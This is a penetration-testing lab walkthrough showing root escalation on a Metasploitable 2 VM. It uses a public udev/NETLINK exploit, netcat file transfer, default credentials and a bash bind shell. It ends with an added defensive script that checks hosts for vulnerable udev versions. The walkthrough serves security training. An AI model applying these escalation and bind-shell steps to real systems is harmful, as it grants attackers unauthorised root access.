Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example
Victim: Metasploitable 2
Note: This exploit leverages a vulnerability in NETLINK.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).
Download the Exploit from ExploitDB
Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).
Telnet to Metasploitable 2, then Upload and Compile the Exploit
Telnet to Metasploitable 2, then start a netcat listener.
In Kali, we’re going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we’re going to receive and untar the exploit, then compile it with gcc.
Trying 192.168.1.10...
Connected to 192.168.1.10.
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login:
Password:
Linux metasploitable 2.6.24-16-server #1 SMP i686
msfadmin@metasploitable:~$
listening on [any] 12345 ...
Open a new tab, tar the exploit and pipe the output to netcat.
(UNKNOWN) [192.168.1.10] 12345 (?) open
Back in the first tab we can see our Kali machine connect.
Allow a few seconds for the file transfer to complete, then press CTRL+C to end the session.
Check the exploit has been received, then compile with gcc.
msfadmin@metasploitable:~$
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$
Executing the Exploit
Now we just need to get the PID of the udevd netlink socket on Metasploitable 2, create our run script (bind an instance of bash to a netcat listener) and execute the exploit.
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$
msfadmin@metasploitable:/tmp$
msfadmin@metasploitable:/tmp$
msfadmin@metasploitable:~$
Open a new tab and connect to the bind shell.
(UNKNOWN) [192.168.1.10] 2345 (?) open
root@metasploitable:/#
root
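The socket line shown above has the format of /proc/net/netlink, and the same table is useful for auditing a host. The following shell script is an added example, not part of the original walkthrough or of the exploit: it lists sockets on netlink protocol 15 (NETLINK_KOBJECT_UEVENT, the channel udevd listens on) and flags the host when the udev version is below 141. The function names, the sample table and the version number 117 are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original page or the exploit).
# /proc/net/netlink columns: sk Eth Pid Groups Rmem Wmem Dump Locks [...]
# "Eth" is the netlink protocol; 15 is NETLINK_KOBJECT_UEVENT.
UEVENT_PROTO=15
FIXED_UDEV=141   # from the page title: udev < 141 is affected

# Print "port_id groups" for each uevent socket in a /proc/net/netlink-format file.
uevent_sockets() {
    awk -v proto="$UEVENT_PROTO" '
        $1 == "sk" { next }                      # skip the header row
        NF >= 8 && $2 == proto { print $3, $4 }
    ' "${1:-/proc/net/netlink}"
}

# Return 0 when the udev version (e.g. from `udevadm --version`) is below the fix.
udev_is_affected() {
    case "$1" in ''|*[!0-9]*) return 0 ;; esac   # unparseable: fail closed
    [ "$1" -lt "$FIXED_UDEV" ]
}

# Flag the host only if an old udev is installed AND a uevent listener exists.
audit_host() {   # $1 = udev version, $2 = netlink table file
    ports=$(uevent_sockets "$2" | awk '{printf "%s%s", sep, $1; sep=","}')
    if udev_is_affected "$1" && [ -n "$ports" ]; then
        echo "AFFECTED udev=$1 uevent_ports=$ports"
    else
        echo "OK udev=$1"
    fi
}

# Constructed sample: header, the socket line shown on this page, one unrelated row.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df552800 15  2738   00000001 0        0        00000000 2
df6a1c00 0   0      00000000 0        0        00000000 2
EOF
audit_host 117 "$SAMPLE"   # 117 is a constructed version number
audit_host 141 "$SAMPLE"
rm -f "$SAMPLE"
```

On a live system, call uevent_sockets with no argument to read /proc/net/netlink directly.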